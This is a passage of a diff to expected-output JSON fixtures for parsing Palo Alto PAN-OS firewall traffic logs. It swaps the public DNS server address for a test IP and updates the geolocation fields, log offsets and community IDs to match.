         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 38290,
+        "log.offset": 38470,
         "network.application": "dns",
         "network.bytes": 95,
         "network.community_id": [
-            "1:ABhhejR6X5wUGNDEASaULFU4fWg=",
-            "1:bgNcqcxpiyp3BhNYR4XBMpN3UZE="
+            "1:W9qrdyb7I7XUilQIP7w6Hn4kZ08=",
+            "1:uTeSqnpOPXhWyB2/Nijn3TzVaK8="
         ],
         "network.direction": "unknown",
         "network.packets": 1,
@@ -7910,12 +7796,12 @@
         "observer.vendor": "Palo Alto Networks",
         "panw.panos.action": "allow",
         "panw.panos.destination.interface": "ethernet1/1",
-        "panw.panos.destination.nat.ip": "8.8.8.8",
+        "panw.panos.destination.nat.ip": "175.16.199.1",
         "panw.panos.destination.nat.port": 53,
         "panw.panos.destination.zone": "External",
         "panw.panos.endreason": "n/a",
         "panw.panos.flow_id": "6907",
-        "panw.panos.network.nat.community_id": "1:bgNcqcxpiyp3BhNYR4XBMpN3UZE=",
+        "panw.panos.network.nat.community_id": "1:uTeSqnpOPXhWyB2/Nijn3TzVaK8=",
         "panw.panos.ruleset": "Internet Access",
         "panw.panos.sequence_number": 2825832,
         "panw.panos.source.interface": "ethernet1/3",
@@ -7931,13 +7817,13 @@
         ],
         "related.ip": [
             "0.0.0.0",
-            "192.168.2.4",
-            "8.8.8.8"
+            "175.16.199.1",
+            "192.168.2.4"
         ],
         "rule.name": "Internet Access",
         "server.bytes": 0,
-        "server.ip": "8.8.8.8",
-        "server.nat.ip": "8.8.8.8",
+        "server.ip": "175.16.199.1",
+        "server.nat.ip": "175.16.199.1",
         "server.nat.port": 53,
         "server.packets": 0,
         "server.port": 53,
@@ -7991,7 +7877,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 38791,
+        "log.offset": 38981,
         "network.application": "ssl",
         "network.bytes": 839,
         "network.community_id": [
@@ -8093,7 +7979,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 39295,
+        "log.offset": 39485,
         "network.application": "ssl",
         "network.bytes": 839,
         "network.community_id": [
@@ -8166,17 +8052,18 @@
         "client.nat.port": 41087,
         "client.packets": 1,
         "client.port": 42977,
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 129,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
-        "destination.nat.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
+        "destination.nat.ip": "175.16.199.1",
         "destination.nat.port": 53,
         "destination.packets": 1,
         "destination.port": 53,
@@ -8190,7 +8077,7 @@
         "event.end": "2020-03-27T09:56:52.000+01:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "527 <14>1 2020-03-27T09:57:21+01:00 PA-VM - - - - 1,2020/03/27 09:57:21,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:21,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:21,6374,1,42977,53,41087,53,0x400064,udp,allow,226,97,129,2,2020/03/27 09:56:52,0,any,0,2825827,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,",
+        "event.original": "527 <14>1 2020-03-27T09:57:21+01:00 PA-VM - - - - 1,2020/03/27 09:57:21,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:21,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:21,6374,1,42977,53,41087,53,0x400064,udp,allow,226,97,129,2,2020/03/27 09:56:52,0,any,0,2825827,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,",
         "event.outcome": "success",
         "event.start": "2020-03-27T09:56:52.000+01:00",
         "event.timezone": "+01:00",
@@ -8202,12 +8089,12 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 39799,
+        "log.offset": 39989,
         "network.application": "dns",
         "network.bytes": 226,
         "network.community_id": [
-            "1:hdoGsOENLr5fK5K8mIuTgIbm2Wg=",
-            "1:lhAtaXZMkw0gTHgH77EOc4CkxdA="
+            "1:+l6gRZRPL6TKmBoxyDraQtnDSJA=",
+            "1:ww4QTIX+Tbt+EssSliT8ZrYI1ck="
         ],
         "network.direction": "unknown",
         "network.packets": 2,
@@ -8224,12 +8111,12 @@
         "observer.vendor": "Palo Alto Networks",
         "panw.panos.action": "allow",
         "panw.panos.destination.interface": "ethernet1/1",
-        "panw.panos.destination.nat.ip": "8.8.8.8",
+        "panw.panos.destination.nat.ip": "175.16.199.1",
         "panw.panos.destination.nat.port": 53,
         "panw.panos.destination.zone": "External",
         "panw.panos.endreason": "aged-out",
         "panw.panos.flow_id": "6374",
-        "panw.panos.network.nat.community_id": "1:lhAtaXZMkw0gTHgH77EOc4CkxdA=",
+        "panw.panos.network.nat.community_id": "1:ww4QTIX+Tbt+EssSliT8ZrYI1ck=",
         "panw.panos.ruleset": "Internet Access",
         "panw.panos.sequence_number": 2825827,
         "panw.panos.source.interface": "ethernet1/3",
@@ -8245,13 +8132,13 @@
         ],
         "related.ip": [
             "0.0.0.0",
-            "192.168.2.4",
-            "8.8.8.8"
+            "175.16.199.1",
+            "192.168.2.4"
         ],
         "rule.name": "Internet Access",
         "server.bytes": 129,
-        "server.ip": "8.8.8.8",
-        "server.nat.ip": "8.8.8.8",
+        "server.ip": "175.16.199.1",
+        "server.nat.ip": "175.16.199.1",
         "server.nat.port": 53,
         "server.packets": 1,
         "server.port": 53,
@@ -8276,17 +8163,18 @@
         "client.nat.port": 5824,
         "client.packets": 1,
         "client.port": 52267,
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 0,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
-        "destination.nat.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
+        "destination.nat.ip": "175.16.199.1",
         "destination.nat.port": 53,
         "destination.packets": 0,
         "destination.port": 53,
@@ -8300,7 +8188,7 @@
         "event.end": "2020-03-27T09:57:22.000+01:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "520 <14>1 2020-03-27T09:57:22+01:00 PA-VM - - - - 1,2020/03/27 09:57:21,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:21,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:21,6532,1,52267,53,5824,53,0x400000,udp,allow,97,97,0,1,2020/03/27 09:57:22,0,any,0,2825828,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,",
+        "event.original": "520 <14>1 2020-03-27T09:57:22+01:00 PA-VM - - - - 1,2020/03/27 09:57:21,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:21,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:21,6532,1,52267,53,5824,53,0x400000,udp,allow,97,97,0,1,2020/03/27 09:57:22,0,any,0,2825828,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,",
         "event.outcome": "success",
         "event.start": "2020-03-27T09:57:22.000+01:00",
         "event.timezone": "+01:00",
@@ -8312,12 +8200,12 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 40306,
+        "log.offset": 40506,
         "network.application": "dns",
         "network.bytes": 97,
         "network.community_id": [
-            "1:2UJKDufQ7AqX/DyPKII+SBYkgK0=",
-            "1:TltHx0JK89MKaBFVWBKuQ2R7fek="
+            "1:I60a/y/DT6DffHOeA5irTkk6J/Q=",
+            "1:VZg3ZyZLl9WZSR2ESTU/o+cNlLU="
         ],
         "network.direction": "unknown",
         "network.packets": 1,
@@ -8334,12 +8222,12 @@
         "observer.vendor": "Palo Alto Networks",
         "panw.panos.action": "allow",
         "panw.panos.destination.interface": "ethernet1/1",
-        "panw.panos.destination.nat.ip": "8.8.8.8",
+        "panw.panos.destination.nat.ip": "175.16.199.1",
         "panw.panos.destination.nat.port": 53,
         "panw.panos.destination.zone": "External",
         "panw.panos.endreason": "n/a",
         "panw.panos.flow_id": "6532",
-        "panw.panos.network.nat.community_id": "1:TltHx0JK89MKaBFVWBKuQ2R7fek=",
+        "panw.panos.network.nat.community_id": "1:VZg3ZyZLl9WZSR2ESTU/o+cNlLU=",
         "panw.panos.ruleset": "Internet Access",
         "panw.panos.sequence_number": 2825828,
         "panw.panos.source.interface": "ethernet1/3",
@@ -8355,13 +8243,13 @@
         ],
         "related.ip": [
             "0.0.0.0",
-            "192.168.2.4",
-            "8.8.8.8"
+            "175.16.199.1",
+            "192.168.2.4"
         ],
         "rule.name": "Internet Access",
         "server.bytes": 0,
-        "server.ip": "8.8.8.8",
-        "server.nat.ip": "8.8.8.8",
+        "server.ip": "175.16.199.1",
+        "server.nat.ip": "175.16.199.1",
         "server.nat.port": 53,
         "server.packets": 0,
         "server.port": 53,
@@ -8386,17 +8274,18 @@
         "client.nat.port": 45069,
         "client.packets": 1,
         "client.port": 38271,
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 0,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
-        "destination.nat.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
+        "destination.nat.ip": "175.16.199.1",
         "destination.nat.port": 53,
         "destination.packets": 0,
         "destination.port": 53,
@@ -8410,7 +8299,7 @@
         "event.end": "2020-03-27T09:57:22.000+01:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "521 <14>1 2020-03-27T09:57:22+01:00 PA-VM - - - - 1,2020/03/27 09:57:21,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:21,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:21,7511,1,38271,53,45069,53,0x400000,udp,allow,98,98,0,1,2020/03/27 09:57:22,0,any,0,2825830,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,",
+        "event.original": "521 <14>1 2020-03-27T09:57:22+01:00 PA-VM - - - - 1,2020/03/27 09:57:21,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:21,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:21,7511,1,38271,53,45069,53,0x400000,udp,allow,98,98,0,1,2020/03/27 09:57:22,0,any,0,2825830,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,",
         "event.outcome": "success",
         "event.start": "2020-03-27T09:57:22.000+01:00",
         "event.timezone": "+01:00",
@@ -8422,12 +8311,12 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 40806,
+        "log.offset": 41016,
         "network.application": "dns",
         "network.bytes": 98,
         "network.community_id": [
-            "1:oXHCNatSmIbrlcuJWvZAWRTeyNc=",
-            "1:zdSXmjz/Tji7CoqHzhggI9u9SGo="
+            "1:5dxWtJrfqaJx+OBPMj/KPpn8sZM=",
+            "1:Yb8h28WhmkvCwKoyp/zuEJRCxx8="
         ],
         "network.direction": "unknown",
         "network.packets": 1,
@@ -8444,12 +8333,12 @@
         "observer.vendor": "Palo Alto Networks",
         "panw.panos.action": "allow",
         "panw.panos.destination.interface": "ethernet1/1",
-        "panw.panos.destination.nat.ip": "8.8.8.8",
+        "panw.panos.destination.nat.ip": "175.16.199.1",
         "panw.panos.destination.nat.port": 53,
         "panw.panos.destination.zone": "External",
         "panw.panos.endreason": "n/a",
         "panw.panos.flow_id": "7511",
-        "panw.panos.network.nat.community_id": "1:oXHCNatSmIbrlcuJWvZAWRTeyNc=",
+        "panw.panos.network.nat.community_id": "1:5dxWtJrfqaJx+OBPMj/KPpn8sZM=",
         "panw.panos.ruleset": "Internet Access",
         "panw.panos.sequence_number": 2825830,
         "panw.panos.source.interface": "ethernet1/3",
@@ -8465,13 +8354,13 @@
         ],
         "related.ip": [
             "0.0.0.0",
-            "192.168.2.4",
-            "8.8.8.8"
+            "175.16.199.1",
+            "192.168.2.4"
         ],
         "rule.name": "Internet Access",
         "server.bytes": 0,
-        "server.ip": "8.8.8.8",
-        "server.nat.ip": "8.8.8.8",
+        "server.ip": "175.16.199.1",
+        "server.nat.ip": "175.16.199.1",
         "server.nat.port": 53,
         "server.packets": 0,
         "server.port": 53,
@@ -8526,7 +8415,7 @@
         "input.type": "log",
         "labels.nat_translated": true,
         "labels.ssl_decrypted": true,
-        "log.offset": 41307,
+        "log.offset": 41527,
         "network.application": "google-base",
         "network.bytes": 7129,
         "network.community_id": [
@@ -8628,7 +8517,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 41855,
+        "log.offset": 42075,
         "network.application": "ssl",
         "network.bytes": 575,
         "network.community_id": [
@@ -8730,7 +8619,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 42355,
+        "log.offset": 42575,
         "network.application": "ssl",
         "network.bytes": 553,
         "network.community_id": [
@@ -8832,7 +8721,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 42863,
+        "log.offset": 43083,
         "network.application": "paloalto-wildfire-cloud",
         "network.bytes": 553,
         "network.community_id": [
@@ -8905,17 +8794,18 @@
         "client.nat.port": 28322,
         "client.packets": 1,
         "client.port": 39926,
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 0,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
-        "destination.nat.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
+        "destination.nat.ip": "175.16.199.1",
         "destination.nat.port": 53,
         "destination.packets": 0,
         "destination.port": 53,
@@ -8929,7 +8819,7 @@
         "event.end": "2020-03-27T09:57:21.000+01:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "524 <14>1 2020-03-27T09:57:21+01:00 PA-VM - - - - 1,2020/03/27 09:57:20,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:20,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:20,57869,1,39926,53,28322,53,0x400000,udp,allow,108,108,0,1,2020/03/27 09:57:21,0,any,0,2825820,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,",
+        "event.original": "524 <14>1 2020-03-27T09:57:21+01:00 PA-VM - - - - 1,2020/03/27 09:57:20,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:20,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:20,57869,1,39926,53,28322,53,0x400000,udp,allow,108,108,0,1,2020/03/27 09:57:21,0,any,0,2825820,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,",
         "event.outcome": "success",
         "event.start": "2020-03-27T09:57:21.000+01:00",
         "event.timezone": "+01:00",
@@ -8941,12 +8831,12 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 43414,
+        "log.offset": 43634,
         "network.application": "dns",
         "network.bytes": 108,
         "network.community_id": [
-            "1:gXS9tqyuBg6/0KzAEU4EdHyNAoI=",
-            "1:n1xJjm8dA0w4NLBOwk4MphDhs/8="
+            "1:PPL6I8dFeEQFMg7LaefQPo4mg7E=",
+            "1:UCM/4gFTaAMMTF0fpBQjhb2Xqd8="
         ],
         "network.direction": "unknown",
         "network.packets": 1,
@@ -8963,12 +8853,12 @@
         "observer.vendor": "Palo Alto Networks",
         "panw.panos.action": "allow",
         "panw.panos.destination.interface": "ethernet1/1",
-        "panw.panos.destination.nat.ip": "8.8.8.8",
+        "panw.panos.destination.nat.ip": "175.16.199.1",
         "panw.panos.destination.nat.port": 53,
         "panw.panos.destination.zone": "External",
         "panw.panos.endreason": "n/a",
         "panw.panos.flow_id": "57869",
-        "panw.panos.network.nat.community_id": "1:gXS9tqyuBg6/0KzAEU4EdHyNAoI=",
+        "panw.panos.network.nat.community_id": "1:PPL6I8dFeEQFMg7LaefQPo4mg7E=",
         "panw.panos.ruleset": "Internet Access",
         "panw.panos.sequence_number": 2825820,
         "panw.panos.source.interface": "ethernet1/3",
@@ -8984,13 +8874,13 @@
         ],
         "related.ip": [
             "0.0.0.0",
-            "192.168.2.4",
-            "8.8.8.8"
+            "175.16.199.1",
+            "192.168.2.4"
         ],
         "rule.name": "Internet Access",
         "server.bytes": 0,
-        "server.ip": "8.8.8.8",
-        "server.nat.ip": "8.8.8.8",
+        "server.ip": "175.16.199.1",
+        "server.nat.ip": "175.16.199.1",
         "server.nat.port": 53,
         "server.packets": 0,
         "server.port": 53,
@@ -9015,17 +8905,18 @@
         "client.nat.port": 56717,
         "client.packets": 1,
         "client.port": 50703,
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 0,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
-        "destination.nat.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
+        "destination.nat.ip": "175.16.199.1",
         "destination.nat.port": 53,
         "destination.packets": 0,
         "destination.port": 53,
@@ -9039,7 +8930,7 @@
         "event.end": "2020-03-27T09:57:21.000+01:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "523 <14>1 2020-03-27T09:57:21+01:00 PA-VM - - - - 1,2020/03/27 09:57:20,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:20,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:20,6893,1,50703,53,56717,53,0x400000,udp,allow,109,109,0,1,2020/03/27 09:57:21,0,any,0,2825821,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,",
+        "event.original": "523 <14>1 2020-03-27T09:57:21+01:00 PA-VM - - - - 1,2020/03/27 09:57:20,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:20,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:20,6893,1,50703,53,56717,53,0x400000,udp,allow,109,109,0,1,2020/03/27 09:57:21,0,any,0,2825821,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,",
         "event.outcome": "success",
         "event.start": "2020-03-27T09:57:21.000+01:00",
         "event.timezone": "+01:00",
@@ -9051,12 +8942,12 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 43918,
+        "log.offset": 44148,
         "network.application": "dns",
         "network.bytes": 109,
         "network.community_id": [
-            "1:9a22qc6VhZd089dxhMqfXDdYpNo=",
-            "1:WCrMnjZ+dihWiI8rv04hcCKbIy8="
+            "1:JygoKpjgMjJEmth8VG1ojrwEEhk=",
+            "1:mIodWBA25yfAsnsj6sayls9qjO4="
         ],
         "network.direction": "unknown",
         "network.packets": 1,
@@ -9073,12 +8964,12 @@
         "observer.vendor": "Palo Alto Networks",
         "panw.panos.action": "allow",
         "panw.panos.destination.interface": "ethernet1/1",
-        "panw.panos.destination.nat.ip": "8.8.8.8",
+        "panw.panos.destination.nat.ip": "175.16.199.1",
         "panw.panos.destination.nat.port": 53,
         "panw.panos.destination.zone": "External",
         "panw.panos.endreason": "n/a",
         "panw.panos.flow_id": "6893",
-        "panw.panos.network.nat.community_id": "1:WCrMnjZ+dihWiI8rv04hcCKbIy8=",
+        "panw.panos.network.nat.community_id": "1:mIodWBA25yfAsnsj6sayls9qjO4=",
         "panw.panos.ruleset": "Internet Access",
         "panw.panos.sequence_number": 2825821,
         "panw.panos.source.interface": "ethernet1/3",
@@ -9094,13 +8985,13 @@
         ],
         "related.ip": [
             "0.0.0.0",
-            "192.168.2.4",
-            "8.8.8.8"
+            "175.16.199.1",
+            "192.168.2.4"
         ],
         "rule.name": "Internet Access",
         "server.bytes": 0,
-        "server.ip": "8.8.8.8",
-        "server.nat.ip": "8.8.8.8",
+        "server.ip": "175.16.199.1",
+        "server.nat.ip": "175.16.199.1",
         "server.nat.port": 53,
         "server.packets": 0,
         "server.port": 53,
@@ -9125,17 +9016,18 @@
         "client.nat.port": 39698,
         "client.packets": 1,
         "client.port": 44390,
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 130,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
-        "destination.nat.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
+        "destination.nat.ip": "175.16.199.1",
         "destination.nat.port": 53,
         "destination.packets": 1,
         "destination.port": 53,
@@ -9149,7 +9041,7 @@
         "event.end": "2020-03-27T09:56:50.000+01:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "527 <14>1 2020-03-27T09:57:19+01:00 PA-VM - - - - 1,2020/03/27 09:57:19,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:19,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:19,7565,1,44390,53,39698,53,0x400064,udp,allow,205,75,130,2,2020/03/27 09:56:50,0,any,0,2825811,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,",
+        "event.original": "527 <14>1 2020-03-27T09:57:19+01:00 PA-VM - - - - 1,2020/03/27 09:57:19,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:19,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:19,7565,1,44390,53,39698,53,0x400064,udp,allow,205,75,130,2,2020/03/27 09:56:50,0,any,0,2825811,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,",
         "event.outcome": "success",
         "event.start": "2020-03-27T09:56:50.000+01:00",
         "event.timezone": "+01:00",
@@ -9161,12 +9053,12 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 44421,
+        "log.offset": 44661,
         "network.application": "dns",
         "network.bytes": 205,
         "network.community_id": [
-            "1:/8/NBiUHojwG7Xg0G7kYyPaXr8g=",
-            "1:Vd+4wF3BBhfIti3Ac78v09oGnBA="
+            "1:IpJBYF4oeLKy69S1bLD1GhfWDQ8=",
+            "1:Ox5H5tQQWEuS4PS7D8FAEp7Xf8o="
         ],
         "network.direction": "unknown",
         "network.packets": 2,
@@ -9183,12 +9075,12 @@
         "observer.vendor": "Palo Alto Networks",
         "panw.panos.action": "allow",
         "panw.panos.destination.interface": "ethernet1/1",
-        "panw.panos.destination.nat.ip": "8.8.8.8",
+        "panw.panos.destination.nat.ip": "175.16.199.1",
         "panw.panos.destination.nat.port": 53,
         "panw.panos.destination.zone": "External",
         "panw.panos.endreason": "aged-out",
         "panw.panos.flow_id": "7565",
-        "panw.panos.network.nat.community_id": "1:/8/NBiUHojwG7Xg0G7kYyPaXr8g=",
+        "panw.panos.network.nat.community_id": "1:IpJBYF4oeLKy69S1bLD1GhfWDQ8=",
         "panw.panos.ruleset": "Internet Access",
         "panw.panos.sequence_number": 2825811,
         "panw.panos.source.interface": "ethernet1/3",
@@ -9204,13 +9096,13 @@
         ],
         "related.ip": [
             "0.0.0.0",
-            "192.168.2.4",
-            "8.8.8.8"
+            "175.16.199.1",
+            "192.168.2.4"
         ],
         "rule.name": "Internet Access",
         "server.bytes": 130,
-        "server.ip": "8.8.8.8",
-        "server.nat.ip": "8.8.8.8",
+        "server.ip": "175.16.199.1",
+        "server.nat.ip": "175.16.199.1",
         "server.nat.port": 53,
         "server.packets": 1,
         "server.port": 53,
@@ -9236,14 +9128,7 @@
         "client.packets": 1,
         "client.port": 62393,
         "destination.address": "208.67.222.222",
-        "destination.as.number": 36692,
-        "destination.as.organization.name": "Cisco OpenDNS, LLC",
         "destination.bytes": 124,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
